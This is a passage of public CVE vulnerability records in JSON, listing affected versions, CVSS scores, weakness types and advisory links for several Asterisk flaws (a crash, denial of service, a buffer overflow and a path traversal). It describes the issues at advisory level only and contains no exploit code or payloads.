"versionStartIncluding": "18.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
"matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
"matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
"matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
"matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
"matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
"matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
"matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
"matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
"matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
"matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
"matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
"matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
"matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert6:*:*:*:*:*:*",
"matchCriteriaId": "7A643445-8A73-4ACC-8A96-CA8D6AC8B229",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert7:*:*:*:*:*:*",
"matchCriteriaId": "BD980324-52E2-4D3E-B8D8-52A2DB100306",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert8:*:*:*:*:*:*",
"matchCriteriaId": "4D5B8321-033A-47C5-A277-BE056C5ADB30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert9:*:*:*:*:*:*",
"matchCriteriaId": "12A2585A-A13F-4FD5-9A65-273B7D8A99C8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
},
{
"lang": "es",
"value": "Se ha detectado un problema en Sangoma Asterisk versiones: 13.x anteriores a 13.38.3, versiones 16.x anteriores a 16.19.1, versiones 17.x anteriores a 17.9.4, y versiones 18.x anteriores a 18.5.1, y Certified Asterisk versiones anteriores a 16.8-cert10. Si el controlador del canal IAX2 recibe un paquete que contiene un formato de medios no compatible, puede ocurrir un bloqueo"
}
],
"id": "CVE-2021-32558",
"lastModified": "2024-11-21T06:07:16.057",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-30T14:15:16.910",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-74"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-31878
Vulnerability from fkie_nvd - Published: 2021-07-30 14:15 - Updated: 2024-11-21 06:06
Severity ?
Summary
An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:16.17.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4793E23F-97F7-4F87-B521-1718AA6FAD06",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:16.18.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E01BD9F9-857A-4114-80D6-9F43B230EF3D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:16.19.0:*:*:*:*:*:*:*",
"matchCriteriaId": "00B876D8-5BE7-4F40-9692-4C7C6EE49611",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:18.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "78681A97-2B41-494E-AA7A-3BB953E8497B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:18.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "54266F33-D604-491F-9891-C9D8A1B68135",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:18.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CC9EFF-8916-46E6-97ED-39035541E350",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
},
{
"lang": "es",
"value": "Se ha detectado un problema en PJSIP en Asterisk versiones anteriores a 16.19.1 y versiones anteriores a 18.5.1. Para explotarlo, se debe recibir un re-INVITE sin SDP despu\u00e9s de que Asterisk haya enviado una petici\u00f3n BYE"
}
],
"id": "CVE-2021-31878",
"lastModified": "2024-11-21T06:06:24.867",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-30T14:15:16.690",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-617"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2023-49786 (GCVE-0-2023-49786)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18
VLAI?
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
Severity ?
7.5 (High)
CWE
- CWE-703 - Improper Check or Handling of Exceptional Conditions
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:25.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49786",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-08T14:19:55.907894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-08T14:20:19.222Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:18.647Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-hxj9-xwr8-w8pq",
"discovery": "UNKNOWN"
},
"title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49786",
"datePublished": "2023-12-14T19:47:46.306Z",
"dateReserved": "2023-11-30T13:39:50.862Z",
"dateUpdated": "2025-02-13T17:18:55.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-37457 (GCVE-0-2023-37457)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01
VLAI?
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
Severity ?
7.5 (High)
CWE
- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:30.273Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c= 18.20.0"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c= 20.5.0"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c= 18.9-cert5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:20.393Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-98rc-4j27-74hh",
"discovery": "UNKNOWN"
},
"title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37457",
"datePublished": "2023-12-14T19:43:30.945Z",
"dateReserved": "2023-07-06T13:01:36.996Z",
"dateUpdated": "2025-02-13T17:01:26.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49294 (GCVE-0-2023-49294)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18
VLAI?
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
Severity ?
4.9 (Medium)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:53:45.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:21.896Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-8857-hfmw-vg8f",
"discovery": "UNKNOWN"
},
"title": "Asterisk Path Traversal vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49294",
"datePublished": "2023-12-14T19:40:46.157Z",
"dateReserved": "2023-11-24T16:45:24.314Z",
"dateUpdated": "2025-02-13T17:18:40.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-46837 (GCVE-0-2021-46837)
Vulnerability from cvelistv5 – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17
VLAI?
Summary
